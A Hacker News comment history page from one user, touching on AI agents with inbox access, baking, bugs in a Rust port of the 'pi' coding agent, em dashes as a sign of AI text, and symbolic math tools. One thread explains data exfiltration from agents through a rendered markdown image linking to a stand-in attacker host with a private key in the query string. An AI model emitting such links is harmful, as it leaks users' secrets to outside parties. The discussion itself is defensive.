Hacker Newsnew | past | comments | ask | show | jobs | submit | mr_mitm's commentslogin

How many?

As many as are at OpenAI about a month from now.

If this takes off, I wonder if platforms will start providing API tokens scoped for assistants. They have permissions for non destructive actions like reading mails, flagging important mails, creating drafts, moving to trash, but not more.

How does my email platform know which messages I want my agent to see and which are too sensitive?

I don't see how it's possible to securely give an agent access to your inbox unless it has zero ability to exfiltrate (not sending mail, not making any external network requests). Even then, you need to be careful with artifacts generated by the agent because a markdown file could transmit data when rendered.


> a markdown file could transmit data when rendered.

This is a new threat vector to me. Can you tell me more?


Your markdown file has an image that links to another server controlled by the attacker and the path/query parameters you're attempting to render contains sensitive data.

    ![](https://the-attacker.com/steal?private-key=abc123def

Funny you'd say that. Other people say cooking is art, while baking is a science. No room for errors.

Those people are dead wrong on both counts. Cooking meals benefits more from precision than they claim (if you want reproducible results you best be measuring!), and baking does not require as much precision as they claim (I estimate ingredients all the time when baking and my bakes come out great).

There's a lot of mysticism around baking online, but in truth it's very easy. Just follow the recipe and you'll be ok. You don't need to carefully weigh ingredients and stuff like people say.


It depends, I guess. When I make pizza dough, I use around .1% yeast. Using .4g instead of .8g would make a huge difference, and getting that right without carefully weighing it is neigh impossible.

Cooking is art, baking is a very easy science (weight things and check the temperature), pastry is another thing. That requires talent, experience and a lucky star.

Baking bread is fun because its not science. It had guidelines but thats it

Science can be fun!

if there was no room for "errors", how is it possible that there are tens of thousands of different bread and cookie recipes and stuff like that?

Because while the recipes are easy to follow, you can't fix a baked dough. If you messed up the salt, the yeast, etc. that's it. Cooking is more forgiving in that sense.

Unmaintainable messes of code are also hard to maintain for AI agents. This isn't solely about taste.

This projects huge commit list proves this wrong :(

The project also doesn't work. See my other comment.

Looks like a lot of nonsensical commits.


Yeah, I tried to use this clone of pi for a while and its very, very broken.

First of all it wouldn't build, I have to mess around with git sub-modules to get it building.

Then trying to use it. First of all the scrolling behavior is broken. You cannot scroll properly when there are lots of tool outputs, the window freezes. I also ended up with lots of weird UI bugs when trying to use slash commands. Sometimes they stop the window scrolling, sometimes the slash commands don't even show at all.

The general text output is flaky, how it shows results of tools, the formatting, the colors, whether it auto-scrolls or gets stuck is all very weird and broken.

You can easily force it into a broken state by just running lots of tool calls, then the UI just freezes up.

But just try it and see for yourself...


This looked interesting because I prefer rust over npm.

The first issue I had was to figure out the schema of the models.json, as someone who hadn't used the original pi before. Then I noticed the documented `/skill:` command doesn't exist. That's also hard to see because the slash menu is rendered off screen if the prompt is at the bottom of the terminal. And when I see it, the selected menu items always jumps back to the first line, but looks like he fixed that yesterday.

The tool output appears to mangle the transcript, and I can't even see the exact command it ran, only the output of the command. The README is overwhelmingly long and I don't understand what's important for me as a first time user and what isn't. Benchmarks and code internals aren't too terribly relevant to me at this point.

I looked at the original pi next and realized the config schema is subtly different (snake_case instead of camelCase). Since it was advertised as a port, I expected it to be a drop-in replacement, which is clearly not the case.

All in all it doesn't inspire confidence. Unfortunate.

Edit: The original pi also says that there is a `/skill` command, but then it is missing in the following table: https://github.com/badlogic/pi-mono/tree/main/packages/codin...

The `/skill` command also doesn't seem registered when I use pi. What is going on? How are people using this?

Edit2: Ah, they have to be placed in `~/.pi/agent/skills`, not `~/.pi/skills`, even though according to the docs, both should work: https://github.com/badlogic/pi-mono/tree/main/packages/codin...

This is exhausting.


A corollary of the dead internet theory is the phenomenon where people suspect any content to be AI generated. Sometimes one em dash is enough to spark such suspicions and allegations. Not only is fake content falsely labeled as real, real content is increasingly falsely labeled as fake.

Yes emdashes are very much a sign. I stand by this. Why?

What is the key combo to make an emdash?

On a phone keyboard, sure, it's as hard as an accent sign (á, for example), difficult but not twrrible. But on a keyboard? Yeah, no one is typing in Alt combos when literally any other construction will do.


> On a phone keyboard, sure, it's as hard as an accent sign (á, for example), difficult but not twrrible. But on a keyboard? Yeah, no one is typing in Alt combos when literally any other construction will do.

For me, --- gets converted to an em-dash (—) while typing, if I have my input method (ELatin) enabled. I'm so used to typing in while working in LaTeX I can easily slip it in elsewhere.


Right control (compose), -, -, -. Alt combos are for Windows users who haven't discovered WinCompose, everybody else has some built-in way to enable it in their OS. If they're not on a US-English keyboard, either compose or AltGr is likely already enabled.

Yes, it's very tell tale in forum posts, but blog posts are often rendered markdown, where it's easy to type `--`. But it's not conclusive evidence in either case! The false positive rate is still not negligible if you only go by em dashes.

AltGr - Hypen. How is that different from AltGr - Q for @, AltGr - E for € or even Shift - A? The difficulty is exactly the same.

> What is the key combo to make an emdash?

On macOS (and iPadOS if used with certain external keyboards), it has long been `Option` + `Shift` + `-`. Desktop publishing folks memorized this, and other, typographically helpful key combos many years ago.


The mandatory error handling of Rust is also an amazing feature for catching bugs at compile time. In Python you never know which exceptions might occur at any given time. That's something I completely underestimated in its usefulness, especially now that I have a programming buddy with infinite stamina handling all these errors for me.

Are hallucinations in code generation still a problem? I thought with linters, type checkers, and compilers especially as strict as Rust, LLM agents easily catch their own mistakes. At least that's my experience: the agent writes code, runs linters and compilers, fixes whatever it hallucinated, and I probably get a working solution. I tell it to write unit tests and integration tests and it catches even more of its own mistakes. Not saying that it will always produce code free of bugs, but hallucinations haven't been an issue for me anymore.

Sean also publishes transcripts of all episodes; https://www.preposterousuniverse.com/podcast/2021/07/12/155-...

Back when I was using it, mathematica was unmatched in its ability to find integrals. Has python caught up there?

sympy is good enough for typical uses. the user interface is worse but that doesn't matter to Claude. I imagine if you have some really weird symbolic or numeric integrals, Mathematica may have some highly sophisticated algorithms where it would have an edge.

however, even this advantage is eaten away somewhat because the models themselves are decent at solving hard integrals.


I like to think of Claude as enjoying himself more when working with good tools rather than bad ones. But metaphysics aside, tools that have the functions you would expect, by the names you would expect, with the behavior you would expect, do seem to be just as important when the users are LLMs.

For numeric stuff, I've been playing recently with chebpy (a python implementation of matlab's chebfun), and am really impressed with it so far - https://github.com/chebpy/chebpy

I don't think we should pick a winner. When it comes to mathematical answers the best would to pose the same query to all of them and if they all give the same result then our space-rocket is probably going in the right direction.

I've always sort of assumed the models were just making sympy scripts behind the scenes.

Wheres Godel when you need him. A lot of this stuff is symbol shunting, which LLMs should be really good at.

sometimes you can see them do this and sometimes you can see they just work through the problem in the reasoning tokens without invoking python.

It's symbolics capabilities are still really good, though in my totally subjective opinion not as good as Maxima's.

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: